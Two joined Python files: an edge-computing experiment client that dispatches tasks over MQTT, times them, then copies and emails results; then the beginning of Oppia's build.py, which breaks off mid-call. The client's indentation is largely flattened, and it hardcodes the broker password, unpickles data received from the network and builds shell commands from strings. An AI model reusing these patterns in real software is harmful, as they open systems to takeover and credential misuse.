k = task_record[seq_no][tk] # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
        if len(k) < 3:  # check if I have already received a result for this task id
a = received_task[i]
k.append(dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6])))
p = k[2] - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
elif len(k) == 3:
a = received_task[i]
t = dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6]))
p = t - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
def receive_mec_start(stop):
global task_topic
global task_client
username = 'mec'
password = 'password'
broker_port_no = 1883
task_topic = client_id(ip_address())
task_client = mqtt.Client()
task_client.on_connect = on_connect_task
task_client.on_message = on_receive_task
task_client.username_pw_set(username, password)
task_client.connect(broker_ip, broker_port_no, 60)
task_client.loop_start()
while True:
if stop():
task_client.loop_stop()
task_client.disconnect()
break
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results {} {} {}'.format(filename[algo_id], get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def client_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
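# e.g. client_id('192.168.122.7') -> '007': the last octet is zero-padded to
# three characters because it doubles as this client's MQTT task topic.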
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def task_details(tasks):
global task_dist, total_task_sent, total_split_task
total_task_sent += len(tasks)
for task in tasks:
total_split_task += tasks[task]['wcet']
task_dist[tasks[task]['wcet']] += 1
def name_task(task_list, node_id, seq_no):
# naming nomenclature of tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
# returns task list and waiting_time with proper identification
return {i + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[0][i] for i in task_list[0]}, \
{k + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[1][k] for k in task_list[1]}
def namestr(obj):
namespace = globals()
return [name for name in namespace if namespace[name] is obj]
def split_list(data, _id_):
if _id_ == 4: # 866
return data[:866]
if _id_ == 5: # 867
return data[866:1733]
if _id_ == 6: # 867
return data[1733:]
def save_data(send_path):
result = f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} " \
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}" \
f"\nrecord{len(hosts)} = {record} \nhost_names{len(hosts)} = {host_dict}" \
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}" \
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = " \
f"{total_split_task} " \
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n" \
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}" \
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}" \
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}" \
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
list_result = [
f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} ",
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}",
f"\nrecord{len(hosts)} = {record} ",
f"\nhost_names{len(hosts)} = {host_dict}",
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}"
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = "
f"{total_split_task} "
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n",
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}",
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}",
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}",
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
file_ = open(f'{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py'
os.system(cmd)
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py",
f"mec@{ho['osboxes-0']}:{send_path}"])
send_email(result, send_path)
def run_me(mec_dict, algo_id_, exp_kind, send_path): # get_mec_details(mec_dict, algo_id_) homo/hetero
global record
global client_id_
global seq
global run
global plot
os.system('clear')
print("================== Welcome to Client Platform ===================")
get_mec_details(mec_dict=mec_dict, algo_id_=algo_id_) # get_mec_details(mec_dict, algo_id_)
client_id_ = client_id(ip_address())
stop = False
redeem_task = Thread(target=receive_mec_start, args=(lambda: stop,))
redeem_task.daemon = True
redeem_task.start()
exp_type = {'homo': homo, 'hetero': hetero}
dst = exp_type[exp_kind]
print('Client is connected to servers: {}'.format(hosts))
data = {4: dst.mec4, 7: dst.mec7, 10: dst.mec10}
task_bank = {4: dst.data_list4, 5: dst.data_list5, 6: dst.data_list6}
cmd = ['hostname']
host_id = str(sp.check_output(cmd, shell=True), 'utf-8')[-2]
t_list = task_bank[int(host_id)]
print('experiment started!')
_data_ = split_list(data[len(hosts)], int(host_id))
for i in range(len(_data_)):
seq = i
        rand_host = hosts[int(_data_[i]) - 1]  # host selection using the generated gaussian distribution
_task_ = t_list[i] # tasks, waiting time
_tasks_list = name_task(_task_, client_id(rand_host), i) # id's tasks => ({tasks}, {waiting time})
task_details(_tasks_list[0])
record.append([_tasks_list, host_dict[rand_host]])
for task in _tasks_list[0]:
sec = dt.timedelta(seconds=_task_[1][task[:2]][1])
if i not in task_record: # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
task_record[i] = {task: [sec, get_time()]}
else:
task_record[i][task] = [sec, get_time()]
# client(_tasks_list, rand_host)
task_client.publish(client_id(rand_host), "t {}".format(_tasks_list))
print("Sent {} to {} node_id {} \n\n".format(_tasks_list, rand_host, client_id(rand_host)))
shared_resource_lock.acquire()
plot = 1
shared_resource_lock.release()
time.sleep(3)
time.sleep(r.uniform(0,30))
# messenger.publish(topic=control_topic, data=pickle.dumps(['client finish', host_id]))
task_client.publish('control/control', pickle.dumps(['client finish', host_id]))
print('Client Finished')
while True:
if run == 0:
print('\nProgramme terminated')
print('MEC: ', ho['osboxes-0'])
save_data(send_path=send_path)
time.sleep(1)
break
run = 1
refresh()
class BrokerCom:
def __init__(self, user, pw, ip, sub_topic):
self.user = user
self.pw = pw
self.ip = ip
self.port = 1883
self.topic = sub_topic
self.client = mqtt.Client()
self.run = 1
def on_connect(self, connect_client, userdata, flags, rc):
print("Connected with Code :" + str(rc))
# Subscribe Topic from here
connect_client.subscribe(self.topic)
def on_message(self, message_client, userdata, msg):
global run
print(f'Topic received: {msg.topic}')
data = pickle.loads(msg.payload) #
if data[0] == 'start': # ['start', {hostname: ip}, algo_id, homo/hetero, send_path]
# get_mec_details(mec_dict, algo_id_) homo/hetero (mec_dict, algo_id_, exp_kind)
run_me(mec_dict=data[1], algo_id_=data[2], exp_kind=data[3], send_path=data[4])
elif data[0] == 'stop': # ['stop']
run = 0
def publish(self, topic, data):
self.client.publish(topic, data)
def broker_loop(self):
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.username_pw_set(self.user, self.pw)
self.client.connect(self.ip, self.port, 60)
self.client.loop_start()
while True:
if self.run == 0:
self.client.loop_stop()
self.client.disconnect()
break
def __del__(self):
print('Broker Communication Object Deleted!')
def refresh():
global record, task_dist, task_record, tasks_executed_on_time, tasks_not_executed_on_time, timely_, untimely_
global u_time, t_time, total_split_task, total_task_sent
record = []
task_record = {}
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local': 0, 'mec': 0, 'cloud': 0}
untimely_ = {'local': 0, 'mec': 0, 'cloud': 0}
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def get_mec_details(mec_dict, algo_id_):
global hosts
global host_dict
global algo_id
global ho
ho = mec_dict # {hostname: ip}
algo_id = algo_id_
hosts = sorted(list(ho.values())) # list of Ips
host_dict = dict(zip(list(ho.values()), list(ho.keys()))) # {ip: hostname}
plot = 0
def starter():
global broker_ip
global messenger
global control_topic
global plot
control_topic = 'control/control'
broker_ip = '192.168.122.111'
broker_dict = {'user': 'mec', 'pw': 'password', 'ip': broker_ip,
'sub_topic': 'control/client'}
messenger = BrokerCom(**broker_dict)
h1 = Thread(target=messenger.broker_loop)
h1.daemon = True
h1.start()
while True:
if plot == 1:
drawnow(plot_performance)
shared_resource_lock.acquire()
plot = 0
shared_resource_lock.release()
time.sleep(3)
if __name__ == "__main__":
os.system('clear')
starter()
|
build.py
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are the corresponding hash values. The paths need to be in posix
# style, as they are interpreted by the `url-interpolation` service, which
# treats the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
# Statically served pages from app.yaml should be here too, since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*'
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build process
# is being run from the deploy script.
if deploy_mode:
content = content.replace('version: default', '')
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
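# Illustrative effect (a sketch, not exercised in this file):
#   modify_constants(prod_env=True) rewrites '"DEV_MODE": true' to
#   '"DEV_MODE": false' in constants.ts, and
#   modify_constants(maintenance_mode=True) sets ENABLE_MAINTENANCE_MODE = True
#   in feconf.py, via the regex replacements above.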
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
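# Illustrative example: _insert_hash('css/oppia.css', 'abc123') returns
# 'css/oppia.abc123.css', i.e. the hash is placed between the basename and
# the file extension.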
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
